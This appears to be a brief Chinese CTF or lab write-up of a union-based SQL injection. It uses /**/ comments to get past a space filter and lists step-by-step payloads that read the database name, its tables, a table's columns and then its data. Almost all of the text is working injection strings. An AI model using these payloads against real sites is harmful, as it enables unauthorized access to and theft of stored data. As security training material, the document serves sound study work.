目录
空格被过滤,使用 /**/ 绕过
查询数据库名
-1/**/union/**/select/**/1,database()
查询数据库中的表
-1/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()
查询表中字段
-1/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='iweunwnolg'
查询表中数据
-1/**/union/**/select/**/1,group_concat(abhijtmzdc)/**/from/**/iweunwnolg